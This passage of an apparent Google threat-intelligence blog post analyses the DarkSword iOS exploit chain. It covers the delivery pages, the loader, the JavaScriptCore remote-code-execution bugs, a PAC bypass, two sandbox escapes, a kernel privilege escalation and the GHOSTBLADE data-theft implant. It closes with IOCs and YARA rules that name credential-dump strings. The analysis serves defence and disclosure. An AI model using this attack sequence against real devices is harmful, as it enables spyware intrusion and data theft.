style="vertical-align: baseline;">rce_worker_18.6.js</span></p> <p><span style="vertical-align: baseline;">rce_worker_18.7.js</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-43529</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Memory corruption vulnerability in JavaScriptCore</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">18.7.3, 26.2</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2026-20700</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">User-mode Pointer Authentication Code (PAC) bypass in </span><code style="vertical-align: baseline;">dyld</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">26.3</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">sbox0_main_18.4.js</span></p> <p><span style="vertical-align: baseline;">sbx0_main.js</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-14174</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Memory corruption vulnerability in ANGLE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">18.7.3, 26.2</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">sbx1_main.js</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-43510</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Memory management vulnerability in the iOS kernel</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">18.7.2, 26.1</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">pe_main.js</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-43520</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Memory corruption vulnerability in the iOS kernel</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">18.7.2, 26.1</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 3: Exploits used in DarkSword</span></span></div></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/darksword-ios-exploit-chain-fig20.max-1000x1000.jpg" alt="DarkSword infection chain"> </a> <figcaption class="article-image__caption "><p data-block-key="ijhn8">Figure 20: DarkSword infection chain</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Exploit Delivery</span></h4> <p><span style="vertical-align: baseline;">There are notable similarities and differences between the exploit delivery implementations used by UNC6748, PARS Defense, and UNC6353. We assess that each of the actors built their delivery mechanisms on a base set of logic from the DarkSword developers, and made tweaks to fit their own needs. All three actors had some usage of the </span><code style="vertical-align: baseline;">uid</code><span style="vertical-align: baseline;"> session storage key, but not all in the same way:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We consistently saw UNC6748 landing pages both set the </span><code style="vertical-align: baseline;">uid</code><span style="vertical-align: baseline;"> key, and check it before fetching the exploit loader.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">UNC6748 only set the </span><code style="vertical-align: baseline;">top.location.href</code><span style="vertical-align: baseline;"> property to redirect users if they weren't to be infected.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">PARS Defense used the </span><code style="vertical-align: baseline;">uid</code><span style="vertical-align: baseline;"> key in the same way in January 2026, but the initial activity we saw in November 2025 didn't include it.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Like UNC6748, PARS Defense set </span><code style="vertical-align: baseline;">top.location.href</code><span style="vertical-align: baseline;">, but also set </span><code style="vertical-align: baseline;">window.location.href</code><span style="vertical-align: baseline;"> to the same value.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">UNC6353 set the </span><code style="vertical-align: baseline;">uid</code><span style="vertical-align: baseline;"> key, but did not check it before fetching the exploit loader; a comment in the source code suggests that they did not know if it was required by the subsequent stages.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Based on the actors' differing usages, we assess that this session storage check logic, along with the subsequent logic using </span><code style="vertical-align: baseline;">frame.html</code><span style="vertical-align: baseline;"> to then fetch </span><code style="vertical-align: baseline;">rce_loader.js</code><span style="vertical-align: baseline;"> as observed from UNC6748 and UNC6353, was developed by the DarkSword exploit chain developers. We assess that the additional fingerprinting logic used by PARS Defense in January 2026 and the anti-debug logic used by UNC6748 in November 2025 were likely written by those users to better meet their operational requirements.</span></p> <h4><span style="vertical-align: baseline;">Loader</span></h4> <p><span style="vertical-align: baseline;">All the activity we observed used effectively the same exploit loader, with some minor differences such as PARS Defense's addition of encryption. The loader manages Web Worker objects that are used by the two RCE exploits, along with state transitions throughout the RCE exploit lifecycle. The loader fetches two files for the RCE stages, named variations of </span><code style="vertical-align: baseline;">rce_module.js</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">rce_worker.js</code><span style="vertical-align: baseline;"> (e.g. </span><code style="vertical-align: baseline;">rce_worker_18.4.js</code><span style="vertical-align: baseline;">). The iOS 18.4 exploit splits the logic between the Web Worker script and the main module, which is </span><code style="vertical-align: baseline;">eval</code><span style="vertical-align: baseline;">'d in the same context as the loader; the two different contexts communicate using </span><code style="vertical-align: baseline;">postMessage</code><span style="vertical-align: baseline;"> as the RCE exploit progresses. The iOS 18.6/18.7 RCE exploit, however, contains all of the exploit logic in the worker, and the corresponding </span><code style="vertical-align: baseline;">rce_module.js</code><span style="vertical-align: baseline;"> file just has an unused placeholder function (Figure 21).</span></p> <p><span style="vertical-align: baseline;">The inconsistencies surrounding the correctness of fetching the RCE stages by the loader module are intriguing. One possibility is that the errors were manually corrected by UNC6353 and PARS Defense; alternatively, it is possible that UNC6748 received the exploit chain updates prior to the other users, and the DarkSword developers subsequently fixed those bugs.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>// for displaying hex value function dummyy(x) { return '0x' + x.toString(16); }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 21: </span><code style="vertical-align: baseline;">rce_module_18.7.js</code><span style="vertical-align: baseline;"> contents (UNC6748, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Remote Code Execution Exploits</span></h4> <p><span style="vertical-align: baseline;">GTIG observed two different JavaScriptCore (the JavaScript engine used in WebKit and Apple's Safari browser) vulnerabilities exploited for remote code execution by DarkSword. For devices running versions of iOS prior to 18.6, DarkSword uses CVE-2025-31277, a JIT optimization/type confusion bug which was patched by Apple in iOS 18.6. For devices running iOS 18.6-18.7, DarkSword uses CVE-2025-43529, a garbage collection bug in the Data Flow Graph (DFG) JIT layer of JavaScriptCore which was patched by Apple in iOS 18.7.3 and 26.2 after it was reported by GTIG. Both exploits develop their own </span><code style="vertical-align: baseline;">fakeobj</code><span style="vertical-align: baseline;">/</span><code style="vertical-align: baseline;">addrof</code><span style="vertical-align: baseline;"> primitives, and then build arbitrary read/write primitives the same way on top of them.</span></p> <p><span style="vertical-align: baseline;">Both vulnerabilities were directly chained with CVE-2026-20700, a bug in </span><code style="vertical-align: baseline;">dyld</code><span style="vertical-align: baseline;"> used as a user-mode </span><a href="https://support.apple.com/guide/security/operating-system-integrity-sec8b776536b/1/web/1#sec0167b469d" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Pointer Authentication Codes (PAC)</span></a><span style="vertical-align: baseline;"> bypass to execute arbitrary code, as required by the subsequent exploit stages. This vulnerability was patched by Apple in iOS 26.3 after being reported by GTIG.</span></p> <h4><span style="vertical-align: baseline;">Sandbox Escape Exploits</span></h4> <p><span style="vertical-align: baseline;">Safari is designed to use multiple sandbox layers to isolate the different components of the browser where untrusted user input may be handled. DarkSword uses two separate sandbox escape vulnerabilities, first by pivoting out of the WebContent sandbox into the GPU process, and then by pivoting from the GPU process to </span><code style="vertical-align: baseline;">mediaplaybackd</code><span style="vertical-align: baseline;">. The same sandbox escape exploits were used regardless of which RCE exploit was needed.</span></p> <h5><span style="vertical-align: baseline;">WebContent Sandbox Escape</span></h5> <p><span style="vertical-align: baseline;">As previously discussed by </span><a href="https://projectzero.google/2023/10/an-analysis-of-an-in-the-wild-ios-safari-sandbox-escape.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Project Zero</span></a><span style="vertical-align: baseline;"> and others, Safari's renderer process (known as WebContent) is tightly sandboxed to limit the blast radius of any vulnerabilities it may contain, since it is the most accessible to untrusted user content. To bypass this, DarkSword fetches an exploit called </span><code style="vertical-align: baseline;">sbox0_main_18.4.js</code><span style="vertical-align: baseline;"> or </span><code style="vertical-align: baseline;">sbx0_main.js</code><span style="vertical-align: baseline;"> to break out of the WebContent sandbox. This exploit leverages CVE-2025-14174, a vulnerability in ANGLE where parameters were not sufficiently validated in a specific WebGL operation, leading to out-of-bounds memory operations in Safari's GPU process which the DarkSword developers use to execute arbitrary code within the GPU process.</span></p> <p><span style="vertical-align: baseline;">This vulnerability was reported to Google (the developers of ANGLE) by Apple and GTIG, and was patched in Safari with the release of iOS 18.7.3 and 26.2.</span></p> <h5><span style="vertical-align: baseline;">GPU Sandbox Escape</span></h5> <p><span style="vertical-align: baseline;">In Safari, the GPU process has more privileges than the WebContent sandbox, but still is restricted from accessing much of the rest of the system. To bypass this limitation, DarkSword uses another sandbox escape exploit, </span><code style="vertical-align: baseline;">sbx1_main.js</code><span style="vertical-align: baseline;">, which leverages CVE-2025-43510, a memory management vulnerability in XNU. This is a copy-on-write bug which is exploited to build arbitrary function call primitives in </span><code style="vertical-align: baseline;">mediaplaybackd</code><span style="vertical-align: baseline;">, a system service with a larger set of permissions than the Safari GPU process where they can run the final exploit needed. They do this by loading a copy of the JavaScriptCore runtime into the </span><code style="vertical-align: baseline;">mediaplaybackd</code><span style="vertical-align: baseline;"> process, and executing the next stage exploit within it.</span></p> <p><span style="vertical-align: baseline;">This vulnerability was patched by Apple in iOS 18.7.2 and 26.1.</span></p> <h4><span style="vertical-align: baseline;">Local Privilege Escalation and Final Payload</span></h4> <p><span style="vertical-align: baseline;">Finally, the exploit loaded one last module, </span><code style="vertical-align: baseline;">pe_main.js</code><span style="vertical-align: baseline;">. This uses CVE-2025-43520, a kernel-mode race condition in XNU's virtual filesystem (VFS) implementation, which can be exploited to build physical and virtual memory read/write primitives. This vulnerability was patched by Apple in iOS 18.7.2 and 26.1.</span></p> <p><span style="vertical-align: baseline;">The exploit contains a suite of library classes building on top of their primitives that are used by the different post-exploitation payloads, such as </span><code style="vertical-align: baseline;">Native</code><span style="vertical-align: baseline;">, which provides abstractions for manipulating raw memory and calling native functions, and </span><code style="vertical-align: baseline;">FileUtils</code><span style="vertical-align: baseline;">, which provides a POSIX-like filesystem API. Artifacts left behind from the Webpack process applied to the analyzed GHOSTBLADE sample included file paths that show the structure on disk of these libraries (Figure 22).</span></p> <p><span style="vertical-align: baseline;">We assess that GHOSTBLADE was likely developed by the DarkSword developers, based on the consistency in coding styles and the tight integration between it and the library code, which is notably distinct from how GHOSTKNIFE and GHOSTSABER leveraged these libraries. We also observed additional modifications made to some of the post-exploitation payload libraries in the samples observed from PARS Defense, including additional raw memory buffer manipulation, likely used in follow-on binary modules. Additionally, the libraries in GHOSTBLADE contained a reference to a function called </span><code style="vertical-align: baseline;">startSandworm()</code><span style="vertical-align: baseline;"> which was not implemented within it; we suspect this may be a codename for a different exploit.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>src/InjectJS.js src/libs/Chain/Chain.js src/libs/Chain/Native.js src/libs/Chain/OffsetsStruct.js src/libs/Driver/Driver.js src/libs/Driver/DriverNewThread.js src/libs/Driver/Offsets.js src/libs/Driver/OffsetsTable.js src/libs/JSUtils/FileUtils.js src/libs/JSUtils/Logger.js src/libs/JSUtils/Utils.js src/libs/TaskRop/Exception.js src/libs/TaskRop/ExceptionMessageStruct.js src/libs/TaskRop/ExceptionReplyStruct.js src/libs/TaskRop/MachMsgHeaderStruct.js src/libs/TaskRop/PAC.js src/libs/TaskRop/PortRightInserter.js src/libs/TaskRop/RegistersStruct.js src/libs/TaskRop/RemoteCall.js src/libs/TaskRop/Sandbox.js src/libs/TaskRop/SelfTaskStruct.js src/libs/TaskRop/Task.js src/libs/TaskRop/TaskRop.js src/libs/TaskRop/Thread.js src/libs/TaskRop/ThreadState.js src/libs/TaskRop/VM.js src/libs/TaskRop/VmMapEntry.js src/libs/TaskRop/VMObject.js src/libs/TaskRop/VmPackingParams.js src/libs/TaskRop/VMShmem.js src/loader.js src/main.js src/MigFilterBypassThread.js</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 22: Filepath artifacts from GHOSTBLADE sample</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Outlook and Implications</span></h3> <p><span style="vertical-align: baseline;">The use of both DarkSword and Coruna by a variety of actors demonstrates the ongoing risk of exploit proliferation across actors of varying geography and motivation. Google remains committed to aiding in the mitigation of this problem, in part through our ongoing participation in the </span><a href="https://www.gov.uk/government/publications/the-pall-mall-process-declaration-tackling-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Pall Mall Process</span></a><span style="vertical-align: baseline;">, designed to build consensus and progress toward limiting the harms from the spyware industry. Together, we are focused on developing international norms and frameworks to limit the misuse of these powerful technologies and protect human rights around the world. These efforts are built on earlier governmental actions, including </span><a href="https://www.federalregister.gov/documents/2023/03/30/2023-06730/prohibition-on-use-by-the-united-states-government-of-commercial-spyware-that-poses-risks-to" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">steps taken</span></a><span style="vertical-align: baseline;"> by the US Government to limit government use of spyware, and a </span><a href="https://2021-2025.state.gov/joint-statement-on-efforts-to-counter-the-proliferation-and-misuse-of-commercial-spyware/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">first-of-its-kind international</span></a><span style="vertical-align: baseline;"> commitment to similar efforts.</span></p> <h3><span style="vertical-align: baseline;">Acknowledgments</span></h3> <p><span style="vertical-align: baseline;">We would like to acknowledge and thank Lookout, iVerify, </span><a href="http://projectzero.google/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Project-Zero</span></a><span style="vertical-align: baseline;">, and Apple Security Engineering &amp; Architecture team for their partnership throughout this investigation.</span></p> <h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h3> <p><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a <a href="https://www.virustotal.com/gui/collection/bd631d6c4cec1759bc298b8da180d9ed1d7d89475376bc614176c3541460f40c/summary" rel="noopener" target="_blank">GTI Collection</a> for registered users. We've also uploaded a sample of GHOSTBLADE to VirusTotal.</span></p> <h4><span style="vertical-align: baseline;">Network Indicators</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">IOC</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Threat Actor</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Context</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">snapshare[.]chat</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6748</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DarkSword delivery used in Saudi Arabia</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">62.72.21[.]10</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6748</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GHOSTKNIFE C2 server (November 2025)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">72.60.98[.]48</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6748</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GHOSTKNIFE C2 server (November 2025)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">sahibndn[.]io</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PARS Defense</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DarkSword delivery used in Turkey</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">e5.malaymoil[.]com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PARS Defense</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DarkSword delivery used in Malaysia</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">static.cdncounter[.]net</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6353</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DarkSword delivery via watering holes in Ukraine</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">sqwas.shapelie[.]com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6353</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GHOSTBLADE exfiltration server</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>File Indicators</h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">IOC</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Threat Actor</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Context</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2e5a56beb63f21d9347310412ae6efb29fd3db2d3a3fc0798865a29a3c578d35</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC6353</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Extracted GHOSTBLADE sample</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Detections</span></h3> <h4><span style="vertical-align: baseline;">YARA Rules</span></h4></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_GHOSTKNIFE_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $ = "server_pub_ex" $ = "client_pri_ds" $ = "getfilebyExtention" $ = "getContOfFilesForModule" $ = "carPlayConnectionState" $ = "saveRecordingApp" $ = "getLastItemBack" $ = "the inherted class" $ = "passExtetion" condition: filesize &lt; 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) == 0x4d5a or uint32be(0) == 0x377abcaf) and 4 of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_GHOSTSABER_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $ = "sendDeviceInfoJson" $ = "merge2AppLists" $ = "send_command_to_upper_process" $ = "ChangeStatusCheckSleepInterval" $ = "SendRegEx" $ = "evalJsResponse.json" $ = "sendSimpleUploadJsonObject" $ = "device_info_all" $ = "getPayloadForSimpleStatusRequest" condition: filesize &lt; 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) == 0x4d5a or uint32be(0) == 0x377abcaf) and 4 of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Datamine_GHOSTBLADE_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $ = "/private/var/tmp/wifi_passwords.txt" $ = "/private/var/tmp/wifi_passwords_securityd.txt" $ = "/.com.apple.mobile_container_manager.metadata.plist" fullword $ = "X-Device-UUID: ${" $ = "/installed_apps.txt" fullword $ = "icloud_dump_" fullword condition: filesize &lt; 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) == 0x4d5a or uint32be(0) == 0x377abcaf) and 3 of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_DarkSwordExploitChain_ImplantLib_FilePaths_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $ = "src/InjectJS.js" $ = "src/libs/Chain/Chain.js" $ = "src/libs/Chain/Native.js" $ = "src/libs/Chain/OffsetsStruct.js" $ = "src/libs/Driver/Driver.js" $ = "src/libs/Driver/DriverNewThread.js" $ = "src/libs/Driver/Offsets.js" $ = "src/libs/Driver/OffsetsTable.js" $ = "src/libs/JSUtils/FileUtils.js" $ = "src/libs/JSUtils/Logger.js" $ = "src/libs/JSUtils/Utils.js" $ = "src/libs/TaskRop/Exception.js" $ = "src/libs/TaskRop/ExceptionMessageStruct.js" $ = "src/libs/TaskRop/ExceptionReplyStruct.js" $ = "src/libs/TaskRop/MachMsgHeaderStruct.js" $ = "src/libs/TaskRop/PAC.js" $ = "src/libs/TaskRop/PortRightInserter.js" $ = "src/libs/TaskRop/RegistersStruct.js" $ = "src/libs/TaskRop/RemoteCall.js" $ = "src/libs/TaskRop/Sandbox.js" $ = "src/libs/TaskRop/SelfTaskStruct.js" $ = "src/libs/TaskRop/Task.js" $ = "src/libs/TaskRop/TaskRop.js" $ = "src/libs/TaskRop/Thread.js" $ = "src/libs/TaskRop/ThreadState.js" $ = "src/libs/TaskRop/VM.js" $ = "src/libs/TaskRop/VmMapEntry.js" $ = "src/libs/TaskRop/VMObject.js" $ = "src/libs/TaskRop/VmPackingParams.js" $ = "src/libs/TaskRop/VMShmem.js" $ = "src/MigFilterBypassThread.js" condition: any of them }</code></pre></div>Wed, 18 Mar 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape/<div class="block-paragraph_advanced"><p>Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark</p> <hr/></div> <div class="block-paragraph_advanced"><h3><span 